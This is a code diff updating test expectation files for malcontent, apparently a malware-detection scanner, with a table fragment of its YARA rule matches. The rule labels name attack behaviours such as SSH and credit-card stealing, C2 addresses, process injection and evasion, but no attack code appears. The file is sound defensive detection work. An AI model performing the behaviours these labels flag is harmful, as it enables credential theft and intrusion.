[/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index daf94630e..c514a78a8 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple @@ -13,7 +13,7 @@ discover/system/platform: low discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/var_run: medium evasion/hide_artifacts/pivot_root: medium evasion/hijack_execution/LD_LIBRARY_PATH: low diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple index 1f87e4a19..79881766d 100644 --- a/tests/linux/clean/sonarlint-metadata.json.simple +++ b/tests/linux/clean/sonarlint-metadata.json.simple @@ -2,6 +2,7 @@ 3P/threat_hunting/bruteratel: medium 3P/threat_hunting/github_username: medium 3P/threat_hunting/owasp: medium +c2/addr/ip: medium c2/addr/ip_port: medium c2/addr/php: medium collect/databases/mysql: medium @@ -13,7 +14,7 @@ crypto/uuid: medium data/encoding/json_decode: low data/encoding/json_encode: low discover/network/interface_list: medium -evasion/hidden_paths/dev_mqueue: medium +evasion/covert_location/dev_mqueue: medium evasion/hidden_paths/hidden: medium exec/plugin: low exfil/stealer/credit_card: medium diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple index 0fa63a499..50c4fb0a8 100644 --- a/tests/linux/clean/sudo.simple +++ b/tests/linux/clean/sudo.simple @@ -34,6 +34,7 @@ net/socket/local_addr: low net/socket/receive: low net/socket/send: low os/kernel/seccomp: low +privesc/sudoers: low process/chroot: low process/groupid_set: low process/groups_set: low diff --git a/tests/linux/clean/trivy.simple b/tests/linux/clean/trivy.simple index 9c0c8fc40..ebd3c6b79 100644 --- a/tests/linux/clean/trivy.simple +++ b/tests/linux/clean/trivy.simple @@ -61,8 +61,8 @@ discover/system/sysinfo: medium discover/user/HOME: low discover/user/USER: low evasion/bypass_security/linux/iptables: medium -evasion/hidden_paths/chdir_unusual: medium -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/chdir_unusual: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/hidden: medium evasion/hidden_paths/var_run: medium exec/cmd: medium diff --git a/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple b/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple index e96af3d5e..36842d8a2 100644 --- a/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple +++ b/tests/linux/clean/wikiticker-2015-09-12-sampled.json.simple @@ -1,6 +1,5 @@ # linux/clean/wikiticker-2015-09-12-sampled.json: high anti-behavior/blocklist/user: medium -c2/addr/ip: medium c2/addr/ip_port: medium c2/addr/php: medium credential/gaming/minecraft: medium diff --git a/tests/linux/clean/wolfictl.simple b/tests/linux/clean/wolfictl.simple index 4deb84a60..62f070e43 100644 --- a/tests/linux/clean/wolfictl.simple +++ b/tests/linux/clean/wolfictl.simple @@ -53,7 +53,7 @@ discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium evasion/bypass_security/macos/xprotect: medium -evasion/hidden_paths/dev_shm: medium +evasion/covert_location/dev_shm: medium evasion/hidden_paths/hidden: medium evasion/hide_artifacts/system_directories: medium exec/cmd: medium diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple index f48ddfd6e..7e7f02018 100644 --- a/tests/macOS/2024.Rustdoor/localfile.simple +++ b/tests/macOS/2024.Rustdoor/localfile.simple @@ -26,7 +26,7 @@ exec/script/osa: medium exec/shell/exec: medium exfil/stealer/notes: critical exfil/stealer/office: high -exfil/stealer/ssh: high +exfil/stealer/ssh: medium fs/directory/create: low fs/directory/remove: low fs/file/delete: low diff --git a/tests/npm/2024.distube-fast/postinstall.js.simple b/tests/npm/2024.distube-fast/postinstall.js.simple index caa4286b2..be87fcf61 100644 --- a/tests/npm/2024.distube-fast/postinstall.js.simple +++ b/tests/npm/2024.distube-fast/postinstall.js.simple @@ -1,4 +1,5 @@ # npm/2024.distube-fast/postinstall.js: critical +c2/addr/ip: medium c2/tool_transfer/exe_url: critical c2/tool_transfer/js: critical fs/file/delete: low diff --git a/tests/npm/2024.next-react-notify/tocall.js.simple b/tests/npm/2024.next-react-notify/tocall.js.simple index eaa2180c2..a89d73aa9 100644 --- a/tests/npm/2024.next-react-notify/tocall.js.simple +++ b/tests/npm/2024.next-react-notify/tocall.js.simple @@ -2,6 +2,7 @@ anti-static/obfuscation/batch/echo_off: high anti-static/obfuscation/powershell/bxor: critical c2/addr/http_ip: high +c2/addr/ip: medium evasion/bypass_security/executionpolicy_bypass: high exec/shell/power: medium fs/file/delete: low diff --git a/tests/npm/2024.persona-tool/preinstall.js.simple b/tests/npm/2024.persona-tool/preinstall.js.simple index ff8992b55..cadd7b7c5 100644 --- a/tests/npm/2024.persona-tool/preinstall.js.simple +++ b/tests/npm/2024.persona-tool/preinstall.js.simple @@ -1,5 +1,6 @@ # npm/2024.persona-tool/preinstall.js: critical anti-static/obfuscation/generic/hex_conversion: medium +c2/addr/ip: medium c2/discovery/ip_dns_resolver: medium data/encoding/json_encode: low discover/system/hostname_get: low diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple index 8aaab34c0..9507a5e9b 100644 --- a/tests/php/clean/composer-2.7.7.simple +++ b/tests/php/clean/composer-2.7.7.simple @@ -2,6 +2,7 @@ anti-behavior/anti_debugger: medium anti-static/obfuscation/php/non_printable_chars: medium c2/addr/http_dynamic: medium +c2/addr/ip: medium c2/addr/ip_port: medium c2/addr/php: medium c2/discovery/ip_dns_resolver: medium diff --git a/tests/python/clean/setuptools/build_meta.py.simple b/tests/python/clean/setuptools/build_meta.py.simple index cee97b96d..2e2b367ca 100644 --- a/tests/python/clean/setuptools/build_meta.py.simple +++ b/tests/python/clean/setuptools/build_meta.py.simple @@ -1,6 +1,5 @@ # python/clean/setuptools/build_meta.py: medium 3P/threat_hunting/monkey: medium -c2/addr/ip: medium c2/tool_transfer/download: medium c2/tool_transfer/github_raw: medium data/embedded/html: medium